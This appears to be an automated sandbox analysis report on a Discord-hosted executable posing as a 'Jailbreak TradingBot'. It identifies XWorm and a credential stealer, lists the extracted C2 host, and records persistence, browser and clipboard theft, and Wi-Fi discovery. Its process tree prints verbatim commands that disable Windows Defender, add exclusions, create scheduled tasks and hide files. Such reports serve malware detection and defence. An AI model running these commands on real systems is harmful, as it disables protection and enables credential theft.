Analysis
max time kernel: 104s
max time network: 107s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
submitted: 23/08/2024, 23:23
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://cdn.discordapp.com/attachments/1275873273644580904/1276270025006645339/Jailbreak_TradingBot.exe?ex=66ca3c15&is=66c8ea95&hm=a4fdff645b9658b689affe91012631fa21351b61107fdd456bede4a50b2c93a8&
Resource: win10v2004-20240802-en
General
Target: https://cdn.discordapp.com/attachments/1275873273644580904/1276270025006645339/Jailbreak_TradingBot.exe?ex=66ca3c15&is=66c8ea95&hm=a4fdff645b9658b689affe91012631fa21351b61107fdd456bede4a50b2c93a8&
Malware Config
Extracted
xworm
pressure-pl.gl.at.ply.gg:16289:16289
pressure-pl.gl.at.ply.gg:16289
Install_directory: %AppData%
install_file: XClient.exe
Signatures
Detect Xworm Payload 2 IoCs
resource | yara_rule
behavioral1/files/0x0007000000023478-92.dat | family_xworm
behavioral1/memory/5504-99-0x00000000005B0000-0x00000000005C8000-memory.dmp | family_xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious access to, or copying of, the web browser credential store.
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
pid | Process
5552 | powershell.exe
5404 | powershell.exe
5884 | powershell.exe
5380 | powershell.exe
600 | powershell.exe
600 | powershell.exe
6092 | powershell.exe
4228 | powershell.exe
4372 | powershell.exe
4848 | powershell.exe
4040 | powershell.exe
1596 | powershell.exe
5188 | powershell.exe
4980 | powershell.exe
2168 | powershell.exe
3768 | powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 9 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | Built.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | Built.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | Built.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe
Checks computer location settings 2 TTPs 5 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | Opperhoofd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | Jailbreak TradingBot.exe
Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | Jailbreak TradingBot.exe
Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | Jailbreak TradingBot.exe
Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | Jailbreak TradingBot.exe
Clipboard Data 1 TTPs 6 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid | Process
5216 | cmd.exe
5608 | powershell.exe
3968 | cmd.exe
220 | powershell.exe
1684 | cmd.exe
5284 | powershell.exe
Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | Opperhoofd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | Opperhoofd.exe
Executes dropped EXE 22 IoCs
pid | Process
5320 | Jailbreak TradingBot.exe
5260 | Jailbreak TradingBot.exe
5504 | Opperhoofd.exe
5588 | Built.exe
5708 | Built.exe
5844 | Jailbreak TradingBot.exe
5936 | Opperhoofd.exe
6024 | Built.exe
5244 | Built.exe
5884 | rar.exe
5156 | XClient.exe
5700 | Jailbreak TradingBot.exe
5704 | Opperhoofd.exe
5680 | Built.exe
5304 | Built.exe
1884 | rar.exe
372 | Jailbreak TradingBot.exe
5652 | Opperhoofd.exe
5512 | Built.exe
1876 | Built.exe
5156 | rar.exe
2260 | XClient.exe
Loads dropped DLL 64 IoCs
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials and other sensitive data.
Unsecured Credentials: Credentials In Files 1 TTPs
Steals credentials from unsecured files.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | Opperhoofd.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow | ioc
103 | discord.com
104 | discord.com
71 | discord.com
72 | discord.com
85 | discord.com
86 | discord.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
49 | ip-api.com
68 | ip-api.com
83 | ip-api.com
101 | ip-api.com
Enumerates processes with tasklist 1 TTPs 15 IoCs
pid | Process
5588 | tasklist.exe
4320 | tasklist.exe
5792 | tasklist.exe
5996 | tasklist.exe
2720 | tasklist.exe
5324 | tasklist.exe
6120 | tasklist.exe
5488 | tasklist.exe
1472 | tasklist.exe
6024 | tasklist.exe
5852 | tasklist.exe
2660 | tasklist.exe
5652 | tasklist.exe
5044 | tasklist.exe
768 | tasklist.exe
Hide Artifacts: Hidden Files and Directories 1 TTPs 3 IoCs
pid | Process
5252 | cmd.exe
3664 | cmd.exe
3632 | cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description | ioc | Process
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
3936 | cmd.exe
3892 | PING.EXE
5288 | cmd.exe
3860 | PING.EXE
5264 | cmd.exe
2780 | PING.EXE
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid | Process
5556 | cmd.exe
6068 | netsh.exe
3312 | cmd.exe
5700 | netsh.exe
1288 | cmd.exe
3992 | netsh.exe
Detects videocard installed 1 TTPs 9 IoCs
Uses WMIC.exe to determine which video card is installed.
pid | Process
3860 | WMIC.exe
1748 | WMIC.exe
5596 | WMIC.exe
4828 | WMIC.exe
1700 | WMIC.exe
5736 | WMIC.exe
3688 | WMIC.exe
5608 | WMIC.exe
5676 | WMIC.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Gathers system information 1 TTPs 3 IoCs
Runs systeminfo.exe.
pid | Process
6140 | systeminfo.exe
5372 | systeminfo.exe
5872 | systeminfo.exe
Kills process with taskkill 20 IoCs
pid | Process
6136 | taskkill.exe
5228 | taskkill.exe
5768 | taskkill.exe
5764 | taskkill.exe
5820 | taskkill.exe
5704 | taskkill.exe
5556 | taskkill.exe
5560 | taskkill.exe
5244 | taskkill.exe
5208 | taskkill.exe
1344 | taskkill.exe
6120 | taskkill.exe
6040 | taskkill.exe
5456 | taskkill.exe
5668 | taskkill.exe
5448 | taskkill.exe
5872 | taskkill.exe
3276 | taskkill.exe
5160 | taskkill.exe
6108 | taskkill.exe
NTFS ADS 1 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 346191.crdownload:SmartScreen | msedge.exe
Runs ping.exe 1 TTPs 3 IoCs
pid | Process
3860 | PING.EXE
2780 | PING.EXE
3892 | PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
5604 | schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
5504 | Opperhoofd.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid | Process
3604 | msedge.exe
3604 | msedge.exe
3604 | msedge.exe
3604 | msedge.exe
3604 | msedge.exe
3604 | msedge.exe
3604 | msedge.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 36 IoCs
Suspicious use of SendNotifyMessage 24 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Views/modifies file attributes 1 TTPs 9 IoCs
pid | Process
1932 | attrib.exe
768 | attrib.exe
5936 | attrib.exe
5668 | attrib.exe
5500 | attrib.exe
1536 | attrib.exe
2716 | attrib.exe
5948 | attrib.exe
5296 | attrib.exe
Processes
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1275873273644580904/1276270025006645339/Jailbreak_TradingBot.exe?ex=66ca3c15&is=66c8ea95&hm=a4fdff645b9658b689affe91012631fa21351b61107fdd456bede4a50b2c93a8&
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID: 3604
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa1f8346f8,0x7ffa1f834708,0x7ffa1f834718
  PID: 416
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
  PID: 4388
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
  - Suspicious behavior: EnumeratesProcesses
  PID: 4640
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
  PID: 1684
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  PID: 4936
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  PID: 2460
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
  PID: 4200
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID: 2080
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:1
  PID: 4064
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
  PID: 540
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3444 /prefetch:8
  PID: 2172
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  PID: 2288
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6216 /prefetch:8
  PID: 1920
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
  PID: 1944
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
  PID: 4528
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6632 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID: 5152
  "C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"
  - Executes dropped EXE
  PID: 5260
  "C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"
  - Checks computer location settings
  - Executes dropped EXE
  PID: 5320
    "C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    PID: 5504
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Opperhoofd.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 6092
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        PID: 5844
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Opperhoofd.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      PID: 5552
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      PID: 5404
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      PID: 5884
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
- Scheduled Task/Job: Scheduled Task
PID:5604 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5632
-
-
-
-
    PID 5588: "C:\Users\Admin\AppData\Roaming\Built.exe"
      - Executes dropped EXE
      PID 5708: "C:\Users\Admin\AppData\Roaming\Built.exe"
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Loads dropped DLL
        PID 6056: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'"
          PID 600: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        PID 6068: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          PID 1596: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        PID 6136: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          PID 5652: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
            - Enumerates processes with tasklist
            - Suspicious use of AdjustPrivilegeToken
        PID 5368: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          PID 5408: wmic csproduct get uuid  (image: C:\Windows\System32\Wbem\WMIC.exe)
            - Suspicious use of AdjustPrivilegeToken
        PID 5176: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          PID 5636: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2  (image: C:\Windows\system32\reg.exe)
        PID 5788: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          PID 5840: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2  (image: C:\Windows\system32\reg.exe)
        PID 5700: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          PID 5596: wmic path win32_VideoController get name  (image: C:\Windows\System32\Wbem\WMIC.exe)
            - Detects videocard installed
            - Suspicious use of AdjustPrivilegeToken
        PID 5220: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          PID 5676: wmic path win32_VideoController get name  (image: C:\Windows\System32\Wbem\WMIC.exe)
            - Detects videocard installed
        PID 5252: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe""
          - Hide Artifacts: Hidden Files and Directories
          PID 5948: attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe"  (image: C:\Windows\system32\attrib.exe)
            - Views/modifies file attributes
        PID 6008: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          PID 5792: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
            - Enumerates processes with tasklist
        PID 6052: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          PID 5324: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
            - Enumerates processes with tasklist
        PID 5108: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          PID 5544: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName  (image: C:\Windows\System32\Wbem\WMIC.exe)
        PID 5216: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          - Clipboard Data
          PID 5608: powershell Get-Clipboard  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
            - Clipboard Data
            - Suspicious behavior: EnumeratesProcesses
        PID 220: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          PID 5996: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
            - Enumerates processes with tasklist
        PID 5044: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID 5308: tree /A /F  (image: C:\Windows\system32\tree.com)
        PID 5556: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          - System Network Configuration Discovery: Wi-Fi Discovery
          PID 5596: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          PID 6068: netsh wlan show profile  (image: C:\Windows\system32\netsh.exe)
            - Event Triggered Execution: Netsh Helper DLL
            - System Network Configuration Discovery: Wi-Fi Discovery
        PID 5520: C:\Windows\system32\cmd.exe /c "systeminfo"
          PID 6140: systeminfo  (image: C:\Windows\system32\systeminfo.exe)
            - Gathers system information
        PID 5476: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          PID 5580: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath  (image: C:\Windows\system32\reg.exe)
        PID 5180: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID 5204: tree /A /F  (image: C:\Windows\system32\tree.com)
        PID 5488: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
          PID 5668: attrib -r C:\Windows\System32\drivers\etc\hosts  (image: C:\Windows\system32\attrib.exe)
            - Drops file in Drivers directory
            - Views/modifies file attributes
        PID 5044: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID 5820: tree /A /F  (image: C:\Windows\system32\tree.com)
        PID 5660: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
          PID 5500: attrib +r C:\Windows\System32\drivers\etc\hosts  (image: C:\Windows\system32\attrib.exe)
            - Drops file in Drivers directory
            - Views/modifies file attributes
        PID 5780: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID 5488: tree /A /F  (image: C:\Windows\system32\tree.com)
        PID 5568: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          PID 5044: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
            - Enumerates processes with tasklist
        PID 5664: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID 5628: tree /A /F  (image: C:\Windows\system32\tree.com)
        PID 5632: C:\Windows\system32\cmd.exe /c "tree /A /F"
          PID 5268: tree /A /F  (image: C:\Windows\system32\tree.com)
        PID 5516: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3604"
          PID 5668: taskkill /F /PID 3604  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5676: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3604"
          PID 6136: taskkill /F /PID 3604  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5904: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 416"
          PID 5560: taskkill /F /PID 416  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 6072: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 416"
          PID 5448: taskkill /F /PID 416  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5188: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4388"
          PID 5872: taskkill /F /PID 4388  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5500: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4388"
          PID 3276: taskkill /F /PID 4388  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5700: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4640"
          PID 5768: taskkill /F /PID 4640  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 6024: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4640"
          PID 5160: taskkill /F /PID 4640  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5680: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1684"
          PID 6108: taskkill /F /PID 1684  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5516: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1684"
          PID 5244: taskkill /F /PID 1684  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 4648: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2460"
          PID 6040: taskkill /F /PID 2460  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5904: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2460"
          PID 5476: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          PID 5456: taskkill /F /PID 2460  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5064: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4064"
          PID 5208: taskkill /F /PID 4064  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5872: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4064"
          PID 5308: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          PID 1344: taskkill /F /PID 4064  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5564: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2172"
          PID 5764: taskkill /F /PID 2172  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 6044: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2172"
          PID 5820: taskkill /F /PID 2172  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
